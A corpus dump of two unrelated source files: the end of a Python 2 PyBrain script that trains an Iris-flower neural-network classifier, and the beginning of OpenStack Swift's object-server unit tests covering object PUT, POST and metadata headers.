pat = [[[5.1, 3.5, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.0, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.1, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.6, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.7, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.4, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 2.9, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.3, 3.0, 1.1, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.8, 4.0, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 4.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.3, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.5, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 3.8, 1.7, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.5, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.7, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.7, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.6, 1.0, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.3, 1.7, 0.5], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.9, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.0, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.6, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.5, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.4, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.1, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 4.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 4.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.2, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 3.5, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.0, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.5, 2.3, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.6, 0.6], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.9, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.3, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.3, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[7.0, 3.2, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 3.2, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.9, 3.1, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.3, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.5, 2.8, 4.6, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.5, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 4.7, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[4.9, 2.4, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 2.9, 4.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.2, 2.7, 3.9, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.0, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.0, 4.2, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.2, 4.0, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.9, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.9, 3.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 4.1, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.2, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.5, 3.9, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.2, 4.8, 1.8], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.5, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.7, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 3.0, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.8, 2.8, 4.8, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.0, 5.0, 1.7], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.9, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.6, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.8, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.7, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 3.9, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.7, 5.1, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[5.4, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 3.4, 4.5, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.7, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.3, 4.4, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.5, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.6, 4.4, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 3.0, 4.6, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.6, 4.0, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.3, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.7, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 3.0, 4.2, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.9, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.1, 2.5, 3.0, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 6.0, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.1, 3.0, 5.9, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.9, 5.6, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.8, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.6, 3.0, 6.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[4.9, 2.5, 4.5, 1.7], [0, 0, 1], [2], ['Iris-virginica']], [[7.3, 2.9, 6.3, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 2.5, 5.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.6, 6.1, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.2, 5.1, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.7, 5.3, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.0, 5.5, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[5.7, 2.5, 5.0, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.8, 5.1, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.2, 5.3, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 3.8, 6.7, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.6, 6.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 2.2, 5.0, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.2, 5.7, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.6, 2.8, 4.9, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.8, 6.7, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.7, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.2, 6.0, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 2.8, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 3.0, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.0, 5.8, 1.6], [0, 0, 1], [2], ['Iris-virginica']], [[7.4, 2.8, 6.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.9, 3.8, 6.4, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.8, 5.1, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 2.6, 5.6, 1.4], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 3.0, 6.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 3.4, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.1, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 3.0, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.4, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.1, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.2, 5.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.0, 5.2, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.5, 5.0, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.2, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 3.4, 5.4, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.9, 3.0, 5.1, 1.8], [0, 0, 1], [2], ['Iris-virginica']]]
alldata = ClassificationDataSet(4, 1, nb_classes=3,
class_labels=['set', 'vers', 'virg'])
for p in pat:
t = p[2]
alldata.addSample(p[0], t)
tstdata, trndata = alldata.splitWithProportion(0.33)
trndata._convertToOneOfMany()
tstdata._convertToOneOfMany()
return trndata, tstdata
"""
Although output layer should be binary with threshold bias layer of 0.5
and input layer should be tanh
"""
def createNN(indim, hiddim, outdim):
nn = buildNetwork(indim, hiddim, outdim,
bias=False,
hiddenclass=TanhLayer,
outclass=ThresholdLayer)
nn.sortModules()
return nn
def associateAstrocyteLayers(nn):
in_to_hidden, = nn.connections[nn['in']]
hidden_to_out, = nn.connections[nn['hidden0']]
hiddenAstrocyteLayer = AstrocyteLayer(nn['hidden0'], in_to_hidden)
outputAstrocyteLayer = AstrocyteLayer(nn['out'], hidden_to_out)
return hiddenAstrocyteLayer, outputAstrocyteLayer
repeats = 3
iterations = 500
all_trn_results = []
all_tst_results = []
def trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer):
inputs = list(trndata['input'])
random.shuffle(inputs)
for inpt in trndata['input']:
nn.activate(inpt)
for m in range(hiddenAstrocyteLayer.astrocyte_processing_iters):
hiddenAstrocyteLayer.update()
outputAstrocyteLayer.update()
hiddenAstrocyteLayer.reset()
outputAstrocyteLayer.reset()
def main():
trndata, tstdata = createDS()
for repeat in xrange(repeats):
print 'trial', repeat
iter_trn_results = []
iter_tst_results = []
nn = createNN(4, 6, 3)
nn.randomize()
hiddenAstrocyteLayer, outputAstrocyteLayer = \
associateAstrocyteLayers(nn)
trainer = BackpropTrainer(nn, dataset=trndata, learningrate=0.01,
momentum=0.1, verbose=False, weightdecay=0.0)
for grand_iter in xrange(iterations):
if grand_iter == 0:
trainer.train()
# trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer)
trainer.train()
trnresult = percentError(trainer.testOnClassData(),
trndata['class'])
iter_trn_results.append(trnresult)
tstresult = percentError(trainer.testOnClassData(dataset=tstdata),
tstdata['class'])
iter_tst_results.append(tstresult)
if not grand_iter % 100:
print 'epoch %4d' % trainer.totalepochs, 'train error %5.2f%%'\
% trnresult, 'test error %5.2f%%' % tstresult
# MAKE SURE NOT IN ITER LOOP
all_trn_results.append(iter_trn_results)
all_tst_results.append(iter_tst_results)
assert array(iter_trn_results).shape == (iterations, ), \
array(iter_trn_results).shape
assert array(iter_tst_results).shape == (iterations, ), \
array(iter_tst_results).shape
assert array(all_trn_results).shape == (repeats, iterations), \
array(all_trn_results).shape
assert array(all_tst_results).shape == (repeats, iterations), \
array(all_tst_results).shape
a = datetime.datetime.now(). utctimetuple()
time_string = str(a[3]) + str(a[4]) + '_' + str(a[2]) + '-' + \
str(a[1]) + '-' + str(a[0])
if os.environ['OS'] == 'Windows_NT':
sep = '\\'
else:
sep = '/'
pybrain_dir = os.getcwd() + sep
assert pybrain_dir[-10:-1] == 'mypybrain', \
'is actually this ' + pybrain_dir[-10:-1]
os.mkdir(pybrain_dir + 'experiment_results' + sep + time_string)
trnf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_trn_results.out', 'w')
np.savetxt(trnf, all_trn_results)
tstf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_tst_results.out', 'w')
np.savetxt(tstf, all_tst_results)
if __name__ == '__main__':
main()
| [
"dalberto.adler@gmail.com"
] | dalberto.adler@gmail.com |
a0c8ab45ee293002eb2896412bc5d8ad46314948 | f62fd455e593a7ad203a5c268e23129473d968b6 | /swift-2.13.1/test/unit/obj/test_server.py | 03e40a730d03da0616400cb61955cb0a5ba0eec7 | [
"Apache-2.0"
] | permissive | MinbinGong/OpenStack-Ocata | 5d17bcd47a46d48ff9e71e2055f667836174242f | 8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3 | refs/heads/master | 2021-06-23T05:24:37.799927 | 2017-08-14T04:33:05 | 2017-08-14T04:33:05 | 99,709,985 | 0 | 2 | null | 2020-07-22T22:06:22 | 2017-08-08T15:48:44 | Python | UTF-8 | Python | false | false | 340,294 | py | # coding: utf-8
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.obj.server"""
import six.moves.cPickle as pickle
import datetime
import json
import errno
import operator
import os
import mock
import six
from six import StringIO
import unittest
import math
import random
from shutil import rmtree
from time import gmtime, strftime, time, struct_time
from tempfile import mkdtemp
from hashlib import md5
import tempfile
from collections import defaultdict
from contextlib import contextmanager
from textwrap import dedent
from eventlet import sleep, spawn, wsgi, Timeout, tpool, greenthread
from eventlet.green import httplib
from nose import SkipTest
from swift import __version__ as swift_version
from swift.common.http import is_success
from test import listen_zero
from test.unit import FakeLogger, debug_logger, mocked_http_conn, \
make_timestamp_iter, DEFAULT_TEST_EC_TYPE
from test.unit import connect_tcp, readuntil2crlfs, patch_policies, \
encode_frag_archive_bodies
from swift.obj import server as object_server
from swift.obj import updater
from swift.obj import diskfile
from swift.common import utils, bufferedhttp
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.utils import hash_path, mkdirs, normalize_timestamp, \
NullLogger, storage_directory, public, replication, encode_timestamps, \
Timestamp
from swift.common import constraints
from swift.common.swob import Request, WsgiBytesIO
from swift.common.splice import splice
from swift.common.storage_policy import (StoragePolicy, ECStoragePolicy,
POLICIES, EC_POLICY)
from swift.common.exceptions import DiskFileDeviceUnavailable, \
DiskFileNoSpace, DiskFileQuarantined
from swift.common.wsgi import init_request_processor
def mock_time(*args, **kwargs):
return 5000.0
test_policies = [
StoragePolicy(0, name='zero', is_default=True),
ECStoragePolicy(1, name='one', ec_type=DEFAULT_TEST_EC_TYPE,
ec_ndata=10, ec_nparity=4),
]
@contextmanager
def fake_spawn():
"""
Spawn and capture the result so we can later wait on it. This means we can
test code executing in a greenthread but still wait() on the result to
ensure that the method has completed.
"""
greenlets = []
def _inner_fake_spawn(func, *a, **kw):
gt = greenthread.spawn(func, *a, **kw)
greenlets.append(gt)
return gt
object_server.spawn = _inner_fake_spawn
with mock.patch('swift.obj.server.spawn', _inner_fake_spawn):
try:
yield
finally:
for gt in greenlets:
gt.wait()
@patch_policies(test_policies)
class TestObjectController(unittest.TestCase):
"""Test swift.obj.server.ObjectController"""
def setUp(self):
"""Set up for testing swift.object.server.ObjectController"""
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
self.tmpdir = mkdtemp()
self.testdir = os.path.join(self.tmpdir,
'tmp_test_object_server_ObjectController')
mkdirs(os.path.join(self.testdir, 'sda1'))
self.conf = {'devices': self.testdir, 'mount_check': 'false',
'container_update_timeout': 0.0}
self.object_controller = object_server.ObjectController(
self.conf, logger=debug_logger())
self.object_controller.bytes_per_sync = 1
self._orig_tpool_exc = tpool.execute
tpool.execute = lambda f, *args, **kwargs: f(*args, **kwargs)
self.df_mgr = diskfile.DiskFileManager(self.conf,
self.object_controller.logger)
self.logger = debug_logger('test-object-controller')
self.ts = make_timestamp_iter()
self.ec_policies = [p for p in POLICIES if p.policy_type == EC_POLICY]
def tearDown(self):
"""Tear down for testing swift.object.server.ObjectController"""
rmtree(self.tmpdir)
tpool.execute = self._orig_tpool_exc
def _stage_tmp_dir(self, policy):
mkdirs(os.path.join(self.testdir, 'sda1',
diskfile.get_tmp_dir(policy)))
def iter_policies(self):
for policy in POLICIES:
self.policy = policy
yield policy
def check_all_api_methods(self, obj_name='o', alt_res=None):
path = '/sda1/p/a/c/%s' % obj_name
body = 'SPECIAL_STRING'
op_table = {
"PUT": (body, alt_res or 201, ''), # create one
"GET": ('', alt_res or 200, body), # check it
"POST": ('', alt_res or 202, ''), # update it
"HEAD": ('', alt_res or 200, ''), # head it
"DELETE": ('', alt_res or 204, '') # delete it
}
for method in ["PUT", "GET", "POST", "HEAD", "DELETE"]:
in_body, res, out_body = op_table[method]
timestamp = normalize_timestamp(time())
req = Request.blank(
path, environ={'REQUEST_METHOD': method},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = in_body
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, res)
if out_body and (200 <= res < 300):
self.assertEqual(resp.body, out_body)
def test_REQUEST_SPECIAL_CHARS(self):
obj = 'special昆%20/%'
self.check_all_api_methods(obj)
def test_device_unavailable(self):
def raise_disk_unavail(*args, **kwargs):
raise DiskFileDeviceUnavailable()
self.object_controller.get_diskfile = raise_disk_unavail
self.check_all_api_methods(alt_res=507)
def test_allowed_headers(self):
dah = ['content-disposition', 'content-encoding', 'x-delete-at',
'x-object-manifest', 'x-static-large-object']
conf = {'devices': self.testdir, 'mount_check': 'false',
'allowed_headers': ','.join(['content-length'] + dah)}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.assertEqual(self.object_controller.allowed_headers, set(dah))
def test_POST_update_meta(self):
# Test swift.obj.server.ObjectController.POST
original_headers = self.object_controller.allowed_headers
test_headers = 'content-encoding foo bar'.split()
self.object_controller.allowed_headers = set(test_headers)
put_timestamp = normalize_timestamp(time())
headers = {'X-Timestamp': put_timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'Baz': 'bazheader',
'X-Object-Sysmeta-Color': 'blue',
'X-Object-Transient-Sysmeta-Shape': 'circle',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'}
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'VERIFY'
etag = '"%s"' % md5('VERIFY').hexdigest()
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'Etag': etag,
})
post_timestamp = normalize_timestamp(time())
headers = {'X-Timestamp': post_timestamp,
'X-Object-Meta-3': 'Three',
'X-Object-Meta-4': 'Four',
'Content-Encoding': 'gzip',
'Foo': 'fooheader',
'Bar': 'barheader',
'Content-Type': 'application/x-test'}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers=headers)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'blue',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
expected_headers = {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'blue',
'X-Object-Meta-3': 'Three',
'X-Object-Meta-4': 'Four',
'Foo': 'fooheader',
'Bar': 'barheader',
'Content-Encoding': 'gzip',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
}
self.assertEqual(dict(resp.headers), expected_headers)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), expected_headers)
post_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': post_timestamp,
'X-Object-Sysmeta-Color': 'red',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'blue',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'blue',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
})
# test defaults
self.object_controller.allowed_headers = original_headers
put_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-1': 'One',
'X-Object-Manifest': 'c/bar',
'Content-Encoding': 'gzip',
'Content-Disposition': 'bar',
'X-Static-Large-Object': 'True',
})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'Etag': etag,
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-1': 'One',
'Content-Encoding': 'gzip',
'X-Object-Manifest': 'c/bar',
'Content-Disposition': 'bar',
'X-Static-Large-Object': 'True',
'X-Backend-Timestamp': put_timestamp,
'X-Timestamp': put_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(put_timestamp)))),
})
post_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': post_timestamp,
'X-Object-Meta-3': 'Three',
'Foo': 'fooheader',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'red',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-3': 'Three',
'X-Static-Large-Object': 'True',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
})
# Test for empty metadata
post_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': post_timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-3': ''})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'red',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-3': '',
'X-Static-Large-Object': 'True',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
})
def test_POST_old_timestamp(self):
ts = time()
orig_timestamp = utils.Timestamp(ts).internal
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': orig_timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
